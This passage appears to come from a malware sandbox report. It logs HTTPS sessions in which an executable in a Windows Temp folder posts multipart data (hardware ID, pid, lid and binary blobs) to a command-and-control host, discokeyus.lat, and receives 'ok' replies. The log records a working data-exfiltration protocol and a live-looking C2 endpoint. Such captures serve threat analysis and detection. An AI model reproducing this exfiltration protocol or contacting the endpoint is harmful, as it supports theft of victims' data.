2024-12-22 01:18:14 UTC	1369	IN	Data Raw: 52 78 78 33 35 6c 2b 49 63 64 4b 73 58 68 61 52 55 64 6e 41 45 58 46 62 6c 61 59 57 64 66 41 5a 46 73 38 62 58 67 66 75 4a 36 66 6d 4b 56 65 6d 4b 79 30 6c 64 6a 67 72 4e 67 41 31 54 4a 52 7a 67 65 6e 6b 64 78 63 30 4a 47 69 53 54 6c 2f 65 70 33 6f 53 4d 36 61 34 68 77 5a 72 44 58 55 69 7a 49 2f 57 45 64 47 5a 51 49 46 51 43 2f 57 57 64 71 57 77 32 45 61 76 47 35 34 58 2f 70 63 48 41 6f 79 54 6c 75 6f 4a 38 46 59 2f 6e 2b 61 42 73 58 68 30 63 41 58 4b 34 58 62 57 30 55 58 74 5a 6d 38 72 33 69 64 2b 31 77 63 6d 6d 4c 64 32 36 39 31 6c 55 72 33 76 4a 6a 45 78 57 66 43 42 34 57 73 6c 4a 75 5a 6c 41 41 6d 53 71 79 2f 65 70 6a 6f 53 4d 36 52 36 42 4d 4b 35 6e 6c 48 54 79 43 36 69 63 63 47 4e 46 66 58 78 36 30 57 32 4a 75 55 67 2b 61 59 50 57 32 34 58 44 6c 64 Data Ascii: Rxx35l+IcdKsXhaRUdnAEXFblaYWdfAZFs8bXgfuJ6fmKVemKy0ldjgrNgA1TJRzgenkdxc0JGiSTl/ep3oSM6a4hwZrDXUizI/WEdGZQIFQC/WWdqWw2EavG54X/pcHAoyTluoJ8FY/n+aBsXh0cAXK4XbW0UXtZm8r3id+1wcmmLd2691lUr3vJjExWfCB4WslJuZlAAmSqy/epjoSM6R6BMK5nlHTyC6iccGNFfXx60W2JuUg+aYPW24XDld
2024-12-22 01:18:14 UTC	1369	IN	Data Raw: 32 61 4c 6e 5a 54 79 54 46 34 57 6b 57 47 35 6b 50 46 68 4f 7a 55 6d 64 6e 57 41 79 58 62 66 4b 7a 35 54 75 76 4f 33 31 77 78 79 45 70 6d 63 39 47 4d 64 72 2b 52 68 59 62 30 52 68 52 43 2f 64 51 5a 69 45 4d 52 70 39 34 2b 4c 44 2f 63 75 5a 31 64 57 75 56 65 47 53 7a 7a 56 6f 73 79 50 52 72 48 52 75 58 42 68 6f 59 75 31 42 76 61 6c 73 4b 31 69 53 38 75 76 55 37 75 54 74 55 59 35 52 75 61 72 62 55 53 7a 69 4d 37 43 6b 43 56 4a 59 4c 58 30 72 33 56 47 46 71 55 41 61 61 61 76 69 77 37 57 6e 75 66 48 31 68 6a 47 74 6a 76 39 68 57 4b 38 66 38 59 51 6b 59 6e 78 55 61 41 4b 55 58 4a 43 46 54 48 74 59 79 76 49 76 71 61 2f 46 34 4f 46 6d 52 65 6e 2b 7a 30 6c 46 6a 30 37 31 2b 57 78 4f 64 52 30 64 53 73 56 68 6a 59 6c 73 48 6e 32 62 78 75 4f 52 2b 34 48 31 2b 59 6f Data Ascii: 2aLnZTyTF4WkWG5kPFhOzUmdnWAyXbfKz5TuvO31wxyEpmc9GMdr+RhYb0RhRC/dQZiEMRp94+LD/cuZ1dWuVeGSzzVosyPRrHRuXBhoYu1BvalsK1iS8uvU7uTtUY5RuarbUSziM7CkCVJYLX0r3VGFqUAaaaviw7WnufH1hjGtjv9hWK8f8YQkYnxUaAKUXJCFTHtYyvIvqa/F4OFmRen+z0lFj071+WxOdR0dSsVhjYlsHn2bxuOR+4H1+Yo
2024-12-22 01:18:14 UTC	1369	IN	Data Raw: 6e 30 4a 74 31 62 4e 67 46 31 54 4a 52 78 77 56 74 46 5a 67 61 46 67 4a 6b 57 37 75 74 2b 70 70 34 48 70 78 5a 59 74 35 5a 4c 58 56 58 43 72 42 2f 32 6f 63 45 35 34 43 58 31 7a 33 55 48 49 68 44 45 61 33 5a 2f 65 78 74 69 47 68 5a 44 52 78 78 33 35 6c 2b 49 63 64 49 38 62 32 62 52 59 58 6e 67 51 4e 45 37 46 46 61 6d 78 65 46 4a 78 68 2b 62 44 67 64 75 4a 39 66 47 4f 4c 61 32 43 34 33 46 5a 6a 67 72 4e 67 41 31 54 4a 52 7a 77 46 6f 56 31 74 62 55 49 4e 6c 32 6e 71 73 50 30 37 72 7a 74 72 62 35 59 35 4d 61 37 50 53 69 54 54 76 58 35 62 45 35 31 48 52 31 4b 78 58 6d 78 6d 55 67 69 45 62 2f 71 79 34 6e 4c 6f 66 33 4a 72 68 33 31 74 76 39 70 65 4c 38 66 30 5a 42 51 51 6d 41 6b 57 48 66 63 5a 4b 6d 5a 4d 52 73 34 71 33 61 62 75 64 2b 77 37 5a 53 61 65 4f 57 36 Data Ascii: n0Jt1bNgF1TJRxwVtFZgaFgJkW7ut+pp4HpxZYt5ZLXVXCrB/2ocE54CX1z3UHIhDEa3Z/extiGhZDRxx35l+IcdI8b2bRYXngQNE7FFamxeFJxh+bDgduJ9fGOLa2C43FZjgrNgA1TJRzwFoV1tbUINl2nqsP07rztrb5Y5Ma7PSiTTvX5bE51HR1KxXmxmUgiEb/qy4nLof3Jrh31tv9peL8f0ZBQQmAkWHfcZKmZMRs4q3abud+w7ZSaeOW6
2024-12-22 01:18:14 UTC	280	IN	Data Raw: 34 79 72 4a 7a 73 66 68 77 49 59 42 50 56 69 61 57 39 61 41 59 41 71 34 34 4b 6a 4f 2b 35 68 4f 6a 43 2b 59 43 6d 2f 30 78 31 37 6a 4f 5a 67 47 78 4f 4c 45 52 67 65 70 6c 78 6e 62 58 59 4a 6b 58 7a 2f 73 75 35 71 36 44 64 78 5a 63 63 33 4b 62 2f 48 48 58 75 4d 33 47 41 4e 46 37 34 45 44 68 76 33 47 53 70 6d 51 6b 62 4f 4b 73 4c 39 2f 33 6a 78 65 48 56 35 75 54 6b 78 6f 65 45 64 4b 4e 72 30 64 78 67 43 6d 67 6f 54 41 34 6b 58 4d 6a 55 47 56 4d 51 34 72 71 4b 74 5a 4e 34 31 4f 6d 6e 48 49 56 43 68 6e 30 74 6a 6c 4b 45 70 57 77 62 52 58 31 39 56 74 45 56 34 5a 31 63 51 6c 53 33 43 67 38 70 74 36 33 78 71 62 35 42 32 4b 66 61 66 55 6d 4f 55 79 69 63 53 45 34 6f 57 43 52 2b 6e 55 43 70 65 47 6b 61 4f 4b 71 54 39 32 48 6a 76 64 58 31 2b 6c 6a 52 4f 72 74 56 61 Data Ascii: 4yrJzsfhwIYBPViaW9aAYAq44KjO+5hOjC+YCm/0x17jOZgGxOLERgeplxnbXYJkXz/su5q6DdxZcc3Kb/HHXuM3GANF74EDhv3GSpmQkbOKsL9/3jxeHV5uTkxoeEdKNr0dxgCmgoTA4kXMjUGVMQ4rqKtZN41OmnHIVChn0tjlKEpWwbRX19VtEV4Z1cQlS3Cg8pt63xqb5B2KfafUmOUyicSE4oWCR+nUCpeGkaOKqT92HjvdX1+ljROrtVa
2024-12-22 01:18:14 UTC	1369	IN	Data Raw: 32 63 35 64 0d 0a 36 72 75 61 34 4b 4c 59 72 4b 48 66 4a 59 43 6d 75 6e 77 56 78 67 72 4e 31 57 30 7a 52 51 42 77 41 70 56 46 70 64 31 64 42 71 46 54 62 70 2b 42 39 39 6d 70 45 56 6f 42 6a 5a 4c 37 49 54 47 2f 5a 38 47 6b 56 45 34 64 48 55 56 4b 34 46 7a 4a 59 46 45 37 57 56 62 4c 39 39 54 75 35 4f 30 39 72 69 58 64 75 72 73 34 51 42 4e 62 2b 59 51 77 46 30 55 6c 66 46 50 63 50 4f 69 38 55 41 6f 63 71 70 4f 32 2f 49 4c 51 6f 4c 54 6a 56 5a 69 65 68 6e 30 74 6a 6c 4b 45 70 57 77 62 52 58 31 39 56 74 45 56 34 5a 31 63 51 6c 53 33 43 67 38 4e 38 35 33 35 39 65 4d 56 58 59 71 7a 59 48 57 32 4d 2f 43 64 44 4c 64 46 50 58 79 33 35 46 33 49 68 44 45 61 6a 61 66 4b 7a 36 6d 33 77 4e 6c 52 76 67 58 78 75 71 4a 31 7a 4b 4e 6a 30 4a 31 56 55 6c 30 64 48 51 76 6b 58 Data Ascii: 2c5d6rua4KLYrKHfJYCmunwVxgrN1W0zRQBwApVFpd1dBqFTbp+B99mpEVoBjZL7ITG/Z8GkVE4dHUVK4FzJYFE7WVbL99Tu5O09riXdurs4QBNb+YQwF0UlfFPcPOi8UAocqpO2/ILQoLTjVZiehn0tjlKEpWwbRX19VtEV4Z1cQlS3Cg8N85359eMVXYqzYHW2M/CdDLdFPXy35F3IhDEajafKz6m3wNlRvgXxuqJ1zKNj0J1VUl0dHQvkX
2024-12-22 01:18:14 UTC	1369	IN	Data Raw: 57 41 61 62 75 44 30 31 7a 76 66 48 74 2b 6c 32 35 6d 39 2f 46 72 41 76 4c 4e 63 68 67 61 6e 77 41 4a 41 2f 63 5a 4b 6d 34 55 58 71 38 71 74 50 33 53 4e 61 46 6a 4f 6a 44 48 54 47 71 32 30 56 6f 31 33 62 35 41 46 52 4f 51 45 51 38 46 75 42 68 45 56 33 56 47 32 43 72 36 2f 62 55 70 72 7a 74 2b 65 63 63 68 4f 65 71 45 43 48 43 62 6f 7a 55 45 57 6f 68 48 43 56 4c 76 42 53 51 68 52 6b 62 4f 4b 72 75 2b 2f 32 6e 6e 65 47 78 72 77 45 64 58 6e 39 46 61 49 74 72 6a 61 68 63 31 6b 68 59 56 4c 49 6c 43 61 57 39 61 41 59 42 37 76 50 4f 74 64 4b 45 6a 51 79 6a 50 4f 56 62 32 6e 30 56 6a 6c 4c 4e 53 47 42 71 66 41 41 6b 44 2b 6e 42 6b 5a 6c 55 51 68 6d 66 77 6e 4f 35 71 36 7a 73 30 4b 49 45 35 4d 65 71 52 48 53 66 64 73 7a 39 4c 52 73 70 53 54 45 58 6e 42 58 55 76 54 Data Ascii: WAabuD01zvfHt+l25m9/FrAvLNchganwAJA/cZKm4UXq8qtP3SNaFjOjDHTGq20Vo13b5AFROQEQ8FuBhEV3VG2Cr6/bUprzt+ecchOeqECHCbozUEWohHCVLvBSQhRkbOKru+/2nneGxrwEdXn9FaItrjahc1khYVLIlCaW9aAYB7vPOtdKEjQyjPOVb2n0VjlLNSGBqfAAkD+nBkZlUQhmfwnO5q6zs0KIE5MeqRHSfdsz9LRspSTEXnBXUvT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50134	104.21.21.99	443	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:15 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YZJVI288ZGJE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8748 Host: discokeyus.lat
2024-12-22 01:18:15 UTC	8748	OUT	Data Raw: 2d 2d 59 5a 4a 56 49 32 38 38 5a 47 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 5a 4a 56 49 32 38 38 5a 47 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 5a 4a 56 49 32 38 38 5a 47 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 5a 4a 56 49 32 38 38 5a 47 4a 45 0d 0a Data Ascii: --YZJVI288ZGJEContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--YZJVI288ZGJEContent-Disposition: form-data; name="pid"2--YZJVI288ZGJEContent-Disposition: form-data; name="lid"PsFKDg--pablo--YZJVI288ZGJE
2024-12-22 01:18:16 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fqapfk576bh310lfao02nh6i5a; expires=Wed, 16 Apr 2025 19:04:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BYLQGnn%2F8wBfGru1RSJSXAKvyy6ZP84cKlPCWm%2FphgC8Swtk1nSxqgHXIl7BG3Ejy1DJc5yDX6tZ%2FC2qx5eDzm%2FnH39rEm%2FhjRrDTh4zkY5IGCeAEtrl7DTG9c05149IA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c46e62f06c330-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1503&rtt_var=584&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9679&delivery_rate=1841109&cwnd=235&unsent_bytes=0&cid=0c2205bf5d2a3bd2&ts=790&x=0"
2024-12-22 01:18:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50140	104.21.21.99	443	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:19 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZXU50Q0QI7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20389 Host: discokeyus.lat
2024-12-22 01:18:19 UTC	15331	OUT	Data Raw: 2d 2d 5a 58 55 35 30 51 30 51 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 58 55 35 30 51 30 51 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 58 55 35 30 51 30 51 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 58 55 35 30 51 30 51 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --ZXU50Q0QI7Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--ZXU50Q0QI7Content-Disposition: form-data; name="pid"3--ZXU50Q0QI7Content-Disposition: form-data; name="lid"PsFKDg--pablo--ZXU50Q0QI7Content-
2024-12-22 01:18:19 UTC	5058	OUT	Data Raw: 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c Data Ascii: lrQMn 64F6(X&7~`aO@dR<
2024-12-22 01:18:20 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ptukeub9j83d0mlgueamgicvtq; expires=Wed, 16 Apr 2025 19:04:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANdmARMsAnFKfrIRNZCPHigTCq9ngazWp3GG7%2B%2B2mU6ysCFErjWbYWCr7hHX8z97vEBGijuSdGSgQOPDBXWZuGdgGGrDWuwBAR4nVOK1MxkeQUCHf7edZRLR2zw%2F5K106Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c46fbcbe25e64-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1920&rtt_var=730&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21341&delivery_rate=1487519&cwnd=246&unsent_bytes=0&cid=fafae0dc4432a248&ts=1160&x=0"
2024-12-22 01:18:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50141	104.21.21.99	443	348	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:20 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WYVFVGRE6KP60HEI0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 13250 Host: discokeyus.lat
2024-12-22 01:18:20 UTC	13250	OUT	Data Raw: 2d 2d 57 59 56 46 56 47 52 45 36 4b 50 36 30 48 45 49 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 59 56 46 56 47 52 45 36 4b 50 36 30 48 45 49 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 59 56 46 56 47 52 45 36 4b 50 36 30 48 45 49 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d Data Ascii: --WYVFVGRE6KP60HEI0Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--WYVFVGRE6KP60HEI0Content-Disposition: form-data; name="pid"2--WYVFVGRE6KP60HEI0Content-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-22 01:18:21 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vl2lgd5huj99rbva4gdjidrgb3; expires=Wed, 16 Apr 2025 19:05:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJqUe%2FFUK7vq41JnpIKAJ%2FXdjE1az6V8OiuE1dn4ibCPTQCLhsTXZ6swOw1rG9GggTIRfMzQuxts2uckY5RYQ%2FWu1VCNa0wSwaLd%2BCvFT8MX90icszgeNqSvKm1Vg2Q1GQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c470579e442b1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1581&rtt_var=600&sent=11&recv=17&lost=0&retrans=0&sent_bytes=2832&recv_bytes=14187&delivery_rate=1813664&cwnd=211&unsent_bytes=0&cid=7a937e2d4353efe8&ts=807&x=0"
2024-12-22 01:18:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50157	104.21.21.99	443	348	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:26 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=51HCO1EC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8724 Host: discokeyus.lat
2024-12-22 01:18:26 UTC	8724	OUT	Data Raw: 2d 2d 35 31 48 43 4f 31 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 31 48 43 4f 31 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 31 48 43 4f 31 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 35 31 48 43 4f 31 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --51HCO1ECContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--51HCO1ECContent-Disposition: form-data; name="pid"2--51HCO1ECContent-Disposition: form-data; name="lid"PsFKDg--pablo--51HCO1ECContent-Disposit
2024-12-22 01:18:27 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=69ol5iackqibi0n7kh0rnk5m62; expires=Wed, 16 Apr 2025 19:05:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sT9%2BYKuFjKownD1Pk2vciCt71nt4dm2%2FMhUxE0wmM%2BbgzoceJgL3yZdZNiMX3jmZUhmqRwXrCIevyClr92WNWXeHZSSo4JL2DXE8vS%2B%2BKPH2n7dCv2if0%2F8dElLy9UgC1Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4729fc5c0fa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1627&rtt_var=660&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9651&delivery_rate=1596500&cwnd=222&unsent_bytes=0&cid=c7804548fa23a5af&ts=819&x=0"
2024-12-22 01:18:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50158	104.21.21.99	443	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:27 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=76RK6BD5CHRQW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1356 Host: discokeyus.lat
2024-12-22 01:18:27 UTC	1356	OUT	Data Raw: 2d 2d 37 36 52 4b 36 42 44 35 43 48 52 51 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 36 52 4b 36 42 44 35 43 48 52 51 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 36 52 4b 36 42 44 35 43 48 52 51 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 37 36 52 4b 36 42 44 35 43 48 52 Data Ascii: --76RK6BD5CHRQWContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--76RK6BD5CHRQWContent-Disposition: form-data; name="pid"1--76RK6BD5CHRQWContent-Disposition: form-data; name="lid"PsFKDg--pablo--76RK6BD5CHR
2024-12-22 01:18:28 UTC	1124	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7jvvtp55snjmk2f03574gl00e1; expires=Wed, 16 Apr 2025 19:05:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 